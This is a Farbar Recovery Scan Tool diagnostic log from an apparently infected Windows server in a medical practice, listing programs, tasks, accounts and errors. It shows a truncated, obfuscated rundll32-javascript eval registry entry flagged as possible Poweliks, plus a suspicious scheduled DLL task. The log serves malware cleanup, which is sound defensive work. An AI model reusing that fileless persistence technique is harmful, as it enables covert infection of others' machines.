2014-10-16 02:26 - 2009-07-13 23:33 - 03770576 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:23 - 2014-05-06 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:07 - 2011-02-01 15:52 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 07:48 - 2013-07-29 14:18 - 00000000 ____D () C:\Windows\system32\Drivers\NIS
2014-10-15 07:45 - 2013-11-18 20:26 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Internet Security
2014-10-15 07:45 - 2013-07-29 14:19 - 00002425 _____ () C:\Users\Public\Desktop\Norton Internet Security.lnk
2014-10-15 07:44 - 2014-01-20 10:45 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-10-14 15:03 - 2013-09-04 09:53 - 00000000 ____D () C:\Users\Server\Documents\HMS BIOS
2014-10-14 14:01 - 2013-09-03 15:01 - 00000000 ____D () C:\Users\Server\Documents\VACCINATIONS
2014-10-14 10:14 - 2013-09-04 10:12 - 00000000 ____D () C:\Users\Server\Documents\BLANK FORMS
2014-10-07 15:52 - 2011-02-03 15:28 - 00000000 ____D () C:\Users\Server\Documents\MISC
 
Some content of TEMP:
====================
C:\Users\Dr. Shapiro\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\Dr. Shapiro\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
C:\Users\medadmin\AppData\Local\Temp\jre-6u24-windows-i586-iftw-rv.exe
C:\Users\Server\AppData\Local\Temp\ose00000.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-15 23:04
 
==================== End Of Log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 04-11-2014
Ran by Server at 2014-11-04 13:47:13
Running from C:\Users\Server\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Internet Security (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Internet Security (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security (Enabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
32 Bit HP CIO Components Installer (Version: 17.1.1 - Hewlett-Packard) Hidden
Acrobat X Suite (HKLM\...\{3F41BA46-09C3-4500-96D7-DC4390AD0124}) (Version: 1.0 - Adobe Systems Incorporated)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.6 - Adobe Systems)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 2.5.1.17730 - Adobe Systems Inc.)
Adobe Captivate Quiz Results Analyzer (HKLM\...\QuizResultsAnalyzer.E7BED6E5DDA59983786DD72EBFA46B1598278E07.1) (Version: 1.0 - Adobe Systems Incorporated)
Adobe Captivate Reviewer (HKLM\...\AdobeCaptivateReviewer2.E7BED6E5DDA59983786DD72EBFA46B1598278E07.1) (Version: 2.0 - Adobe Systems Incorporated)
Adobe Community Help (HKLM\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.3.0.800 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Media Player (HKLM\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Amazon Cloud Player (HKCU\...\Amazon Amazon Cloud Player) (Version: 1.5.0.341 - Amazon Services LLC)
Amazon MP3 Downloader 1.0.17 (HKLM\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Avery Template (HKLM\...\{A760067A-C07E-1033-0000-A764AC000011}) (Version: 2.0.0.0 - Avery)
Bing Bar (HKLM\...\{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}) (Version: 7.0.609.0 - Microsoft Corporation)
Bing Rewards Client Installer (Version: 16.0.345.0 - Microsoft Corporation) Hidden
Broadcom Gigabit NetLink Controller (HKLM\...\{A325B368-A9EC-40EF-A95C-9DEAD3683AE3}) (Version: 12.33.02 - Broadcom Corporation)
Broadcom Management Programs (HKLM\...\{5DB87A63-9420-48CC-9F9A-B8801D38D6B5}) (Version: 12.35.01 - Broadcom Corporation)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
Crystal Reports Basic Runtime for Visual Studio 2008 (HKLM\...\{CE26F10F-C80F-4377-908B-1B7882AE2CE3}) (Version: 10.5.1.0 - Business Objects)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery Manager (HKLM\...\{4688EB75-28E2-4731-9BCB-55E624F7CD45}) (Version: 1.3 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{3138EAD3-700B-4A10-B617-B3F8096EE30D}) (Version: 1.0.0 - Dell Inc)
FileZilla Client 3.3.5.1 (HKLM\...\FileZilla Client) (Version: 3.3.5.1 - )
HP Deskjet 3050 J610 series Basic Device Software (HKLM\...\{0564C76B-8E1F-4157-8654-B0F9F308BEE9}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 3050 J610 series Help (HKLM\...\{F7632A9B-661E-4FD9-B1A4-3B86BC99847F}) (Version: 140.0.63.63 - Hewlett Packard)
HP Deskjet 3050 J610 series Product Improvement Study (HKLM\...\{34E90074-C80C-4182-A995-65E88B5B56E0}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Photosmart 5510 series Help (HKLM\...\{E02964EA-0E1B-4620-A26E-CBAB0341B1BB}) (Version: 140.0.2.2 - Hewlett Packard)
HP Photosmart 5510 series Product Improvement Study (HKLM\...\{ED696A09-A237-4A29-95FF-95DC4AA8EA1A}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Update (HKLM\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
I.R.I.S. OCR (HKLM\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.1995 - Intel Corporation)
iTivity (HKLM\...\{B4DB7658-A8D2-458C-B68C-9DBA74F1CCD3}) (Version: 5.04.0200 - Tridia Corporation)
Java 2 Runtime Environment Standard Edition v1.3.1_09 (HKLM\...\{70F80C1E-5F26-11D7-88D1-0050DA21757E}) (Version:  - )
Java™ 6 Update 21 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216021F0}) (Version: 6.0.210 - Oracle)
Java™ 6 Update 26 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216022FF}) (Version: 6.0.260 - Oracle)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LG USB Modem driver (HKLM\...\{C3ABE126-2BB2-4246-BFE1-6797679B3579}) (Version:  - )
LiveUpdate 3.3 (Symantec Corporation) (HKLM\...\LiveUpdate) (Version: 3.3.0.101 - Symantec Corporation)
LogMeIn (HKLM\...\{D3AE96EE-2876-4B3F-847C-D3A4AD689E43}) (Version: 4.1.1578 - LogMeIn, Inc.)
Malwarebytes' Anti-Malware (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version:  - Malwarebytes Corporation)
Medical Manager Network Services (HKLM\...\Medical Manager Network Services) (Version:  - )
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM\...\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Sounds (HKLM\...\{10CE1EA2-12E9-11D3-825E-00C04F6843FE}) (Version: 1.0.0.0 - Microsoft Corp)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Module SDK (HKLM\...\{AE5D0144-A524-4A89-99E8-B8D93C4779D2}) (Version: 1.0.1 - Sage Payment Solutions)
Mozilla Firefox 32.0.2 (x86 en-US) (HKLM\...\Mozilla Firefox 32.0.2 (x86 en-US)) (Version: 32.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 32.0.2 - Mozilla)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NetUtils (HKLM\...\NetUtils) (Version:  - )
Norton Internet Security (HKLM\...\NIS) (Version: 21.6.0.32 - Symantec Corporation)
PDF Settings CS5 (Version: 10.0 - Adobe Systems Incorporated) Hidden
Postgres Plus 8.3 (HKLM\...\{883CB130-D056-4D0E-A59F-6EA0A1935985}) (Version: 8.3 - EnterpriseDB/PostgreSQL Global Development Group)
Python 2.5 psycopg2-2.0.14 (HKLM\...\psycopg2-py2.5) (Version:  - )
Python 2.5 pywin32-214 (HKLM\...\pywin32-py2.5) (Version:  - )
Python 2.5 setuptools-0.6c9 (HKLM\...\setuptools-py2.5) (Version:  - )
Python 2.5.4 (HKLM\...\{2E0DFC24-7C4B-4DCF-BCC7-81C513BED3BC}) (Version: 2.5.4150 - Python Software Foundation)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5936 - )
rmss (HKLM\...\{EAF0F9B2-8559-41E8-BBEF-818086AFF696}) (Version: 1.00.000 - Vitera Healthcare Solutions, LLC)
Sage Medical Manager (HKLM\...\{7BF7273F-DBDF-4AB9-B41C-A85B67E1FD75}) (Version: 11.01.00 - Sage Software Healthcare, Inc.)
Sage Medical Manager AppServer (HKLM\...\MMWin AppServer) (Version:  - )
Sage Medical Manager Desktop (HKLM\...\InstallShield_{034135FC-6BD3-4973-BDAA-D408AA058CE7}) (Version: 11.01.00 - Sage Software Healthcare, LLC)
Sage Medical Manager Desktop (Version: 11.01.00 - Sage Software Healthcare, LLC) Hidden
Sage Medical Manager Desktop Server (HKLM\...\InstallShield_{DE630827-F05E-4BD7-989A-8EDA29626BFE}) (Version: 11.01.00 - Sage Software Healthcare, LLC.)
Sage Medical Manager Desktop Server (Version: 11.01.00 - Sage Software Healthcare, LLC.) Hidden
Sage Medical Manager Server (Version: 11.01.00 - Sage Software Healthcare, Inc.) Hidden
Seagate Dashboard (HKLM\...\{67445E65-3D93-428F-83A5-446F7D02689A}) (Version: 3.0.34.1 - Seagate)
SIW version 2010.04.28 (HKLM\...\{AB67580-257C-45FF-B8F4-C8C30682091A}_is1) (Version: 2010.04.28 - Topala Software Solutions)
SmartPrintAPC (HKLM\...\{7F0FF673-BCA7-4A2A-B11C-4D366AF9630B}) (Version: 1.03.0005 - Jones Medical Instrument Company)
The Medical Manager (HKLM\...\The Medical Manager) (Version:  - )
TinyTERM (HKLM\...\{EFF75E8A-5672-49F2-BF99-221BD7C10D66}) (Version: 4.60 - Century Software)
TinyTERM 3.3.10 (HKLM\...\TinyTERM 3.3.10) (Version:  - )
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version:  - )
Yahoo! Detect (HKLM\...\YTdetect) (Version:  - )
ZocDoc Alerter v1104 (HKLM\...\ZocDoc Alerter) (Version: v1104 - ZocDoc)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1000_Classes\CLSID\{3f04dadf-6ea4-44d1-a507-03cad176f443}\InprocServer32 -> C:\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1008_Classes\CLSID\{3f04dadf-6ea4-44d1-a507-03cad176f443}\InprocServer32 -> C:\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1008_Classes\CLSID\{8AD9C840-044E-11D1-B3E9-00805F499D93}\InprocServer32 -> C:\Program Files\Sage Software\jre\bin\npjava131_09.dll (JavaSoft / Sun Microsystems, Inc.)
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1008_Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBA}\InprocServer32 -> C:\Program Files\Sage Software\jre\bin\npjava131_09.dll (JavaSoft / Sun Microsystems, Inc.)
CustomCLSID: HKU\S-1-5-21-2237751552-2111478436-699371372-1008_Classes\CLSID\{CAFEEFAC-0013-0001-0009-ABCDEFFEDCBB}\InprocServer32 -> C:\Program Files\Sage Software\jre\bin\npjava131_09.dll (JavaSoft / Sun Microsystems, Inc.)
 
==================== Restore Points  =========================
 
30-10-2014 17:53:02 Removed HP Photosmart 5510 series Basic Device Software
30-10-2014 20:06:46 Removed HP Officejet 4630 series Basic Device Software
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:04 - 2012-05-09 09:00 - 00001062 ____N C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 activate.adobe.com
65.124.231.35 envoylinkbatch.webmd.com
198.31.9.13 wit.envoy.com
170.138.220.213 itsbatch.emdeon.com
170.138.220.169 its.emdeon.com
64.88.171.98 sts.sagehealth.com
64.57.254.68 prod.trxserv.com
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {07ADA4D7-2417-4C0E-B1DB-AC46581D3B9D} - System32\Tasks\AdobeAAMUpdater-1.0-MMSERV-Server => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-11-08] (Adobe Systems Incorporated)
Task: {119F97B6-2A8B-416C-8564-E3C72359F250} - System32\Tasks\Amazon Music Helper => C:\Users\Server\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe [2013-09-10] ()
Task: {1AB06CDA-FEF2-46D4-BCCA-33342E89C573} - System32\Tasks\Norton Internet Security\Norton Error Analyzer => C:\Program Files\Norton Internet Security\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {25161145-8209-42A1-A146-E16CF2D2B600} - System32\Tasks\Server Merge => C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe [2014-02-10] (Seagate Technology LLC)
Task: {293E728F-6EFA-43FC-A9A2-8E411434201B} - System32\Tasks\HPCustParticipation HP Photosmart 5510 series => C:\Program Files\HP\HP Photosmart 5510 series\Bin\HPCustPartic.exe [2011-05-25] (Hewlett-Packard Co.)
Task: {46A7CBEB-1240-4D2F-A17B-40E7C51E8383} - System32\Tasks\Server DBAgent 2 0 => C:\Program Files\Seagate\Seagate Dashboard 2.0\DBAgent.exe [2014-02-10] (Seagate Technology LLC)
Task: {556EFB97-5513-4671-AF66-6B8D8E39DDBE} - System32\Tasks\Server1 => C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe [2014-02-10] (Seagate Technology LLC)
Task: {6EE58970-8A0E-4559-8B1F-4CCBE9D0D051} - System32\Tasks\HPCustParticipation HP Deskjet 3050 J610 series => C:\Program Files\HP\HP Deskjet 3050 J610 series\Bin\HPCustPartic.exe [2010-11-16] (Hewlett-Packard Co.)
Task: {9668D40A-975C-4784-BF10-82A2029C2AE1} - System32\Tasks\Server => C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe [2014-02-10] (Seagate Technology LLC)
Task: {B5560C31-779C-4D2C-8647-63E4259FCC28} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-25] (Adobe Systems Incorporated)
Task: {BE5E744F-4FDF-4D6E-859A-E61CE8CA8C74} - System32\Tasks\Seagate_Install_Launch => C:\Program Files\Seagate\Seagate Dashboard 2.0\Dashboard.exe [2014-02-10] (Seagate Technology LLC)
Task: {C8DF92BD-609D-4CB3-ADF0-8D9107E6AC9D} - System32\Tasks\Server1 Merge => C:\Program Files\Seagate\Seagate Dashboard 2.0\NBCore.exe [2014-02-10] (Seagate Technology LLC)
Task: {DBF9D3CA-B4A4-451A-B804-4C2DA6EFF34B} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files\Norton Internet Security\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {EE9BA34B-A39F-49DA-B8ED-54735F7BBCE6} - System32\Tasks\{BF532EAA-CEA7-E71B-B906-BABCA179D4D5} => C:\Windows\system32\jvnnbbh.dll [2014-10-31] ()
Task: {F1F6B8D0-597A-4B03-B3B1-9A4CEE1BA713} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Internet Security\Engine\21.6.0.32\WSCStub.exe [2014-09-21] (Symantec Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
 
==================== Loaded Modules (whitelisted) =============
 
2009-03-18 10:14 - 2009-03-18 10:14 - 00107976 _____ () C:\Program Files\Century\TinyTERM\CenLPD.exe
2011-02-01 17:02 - 2010-11-08 05:48 - 00110592 _____ () C:\Program Files\Medical Manager Corporation\AppServer\mmservice.exe
2010-11-21 09:54 - 2010-11-21 09:54 - 00094208 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2009-12-10 03:45 - 2009-12-10 03:45 - 00167936 _____ () C:\PostgresPlus\8.3\bin\LIBPQ.dll
2011-03-28 11:32 - 2012-11-20 14:26 - 00094337 _____ () C:\Program Files\rmss\WIN_MONITOR.exe
2011-03-28 11:32 - 2012-11-20 14:27 - 01212416 _____ () C:\Program Files\rmss\winprocmessage.exe
2011-03-28 11:32 - 2007-10-03 18:09 - 00378743 _____ () C:\Program Files\rmss\sqlite3.dll
2011-03-28 11:32 - 2012-11-20 14:27 - 00823296 _____ () C:\Program Files\rmss\win_server.exe
2009-03-13 16:19 - 2009-03-13 16:19 - 00963584 _____ () C:\PostgresPlus\8.3\bin\libxml2.dll
2009-03-13 16:19 - 2009-03-13 16:19 - 00059904 _____ () C:\PostgresPlus\8.3\bin\zlib1.dll
2009-03-24 16:08 - 2009-03-24 16:08 - 00026624 _____ () C:\PostgresPlus\8.3\lib\plugins\plugin_debugger.dll
2011-02-18 12:31 - 2010-03-15 11:28 - 00141824 _____ () C:\Program Files\WinRAR\rarext.dll
2013-10-01 13:37 - 2013-09-10 19:51 - 03109376 _____ () C:\Users\Server\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
2011-03-29 11:13 - 2010-10-25 12:58 - 00106496 _____ () C:\MED\JDF\service\Wrapper.exe
2011-03-29 11:13 - 2010-10-25 12:51 - 00049152 _____ () C:\MED\JDF\service\Wrapper.dll
2011-02-01 16:05 - 2011-02-01 16:05 - 00095232 _____ () C:\Program Files\Adobe\Adobe Captivate Quiz Results Analyzer\Adobe Captivate Quiz Results Analyzer.exe
2014-11-04 12:35 - 2014-11-04 12:35 - 00718152 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\libglesv2.dll
2014-11-04 12:35 - 2014-11-04 12:35 - 00126280 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\libegl.dll
2014-11-04 12:35 - 2014-11-04 12:35 - 08537928 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\pdf.dll
2014-11-04 12:35 - 2014-11-04 12:35 - 00353096 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\ppGoogleNaClPluginChrome.dll
2014-11-04 12:35 - 2014-11-04 12:35 - 01732936 _____ () C:\Users\Server\AppData\LocalLow\qqxwnru\Udoeomhi\36.0.1985.143\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SMR322 => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: Acrobat Assistant 8.0 => "C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe"
MSCONFIG\startupreg: Adobe Acrobat Speed Launcher => "C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe"
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS5ServiceManager => "C:\Program Files\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: DBRMTray => C:\Dell\DBRM\Reminder\DbrmTrayIcon.exe
MSCONFIG\startupreg: RtHDVCpl => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe -s
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-2237751552-2111478436-699371372-500 - Administrator - Disabled)
Dr. Shapiro (S-1-5-21-2237751552-2111478436-699371372-1003 - Administrator - Enabled) => C:\Users\Dr. Shapiro
Guest (S-1-5-21-2237751552-2111478436-699371372-501 - Limited - Enabled)
HP_Owner (S-1-5-21-2237751552-2111478436-699371372-1004 - Administrator - Enabled)
LogMeInRemoteUser (S-1-5-21-2237751552-2111478436-699371372-1002 - Administrator - Enabled) => C:\Users\LogMeInRemoteUser
medadmin (S-1-5-21-2237751552-2111478436-699371372-1007 - Administrator - Enabled) => C:\Users\medadmin
medical (S-1-5-21-2237751552-2111478436-699371372-1009 - Administrator - Enabled) => C:\Users\medical
postgres (S-1-5-21-2237751552-2111478436-699371372-1008 - Limited - Enabled) => C:\Users\postgres
Server (S-1-5-21-2237751552-2111478436-699371372-1000 - Administrator - Enabled) => C:\Users\Server
 
==================== Faulty Device Manager Devices =============
 
Name: Broadcom NetLink ™ Gigabit Ethernet
Description: Broadcom NetLink ™ Gigabit Ethernet
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Broadcom
Service: k57nd60x
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/04/2014 00:33:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00095c91
Faulting process id: 0xd2c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/04/2014 00:19:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: med.exe, version: 0.0.0.0, time stamp: 0x4ce2cd41
Faulting module name: rundml.dll_unloaded, version: 0.0.0.0, time stamp: 0x4ce2d07b
Exception code: 0xc0000005
Fault offset: 0x100a6699
Faulting process id: 0x1d94
Faulting application start time: 0xmed.exe0
Faulting application path: med.exe1
Faulting module path: med.exe2
Report Id: med.exe3
 
Error: (11/04/2014 10:54:31 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x3cd0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/02/2014 11:36:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094fbf
Faulting process id: 0x6494
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/02/2014 10:08:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00094765
Faulting process id: 0x6bb8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/02/2014 07:31:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 11.0.9600.17344, time stamp: 0x541b8a22
Exception code: 0xc00000fd
Fault offset: 0x00095c74
Faulting process id: 0x69b8
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
 
Error: (11/02/2014 01:19:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7
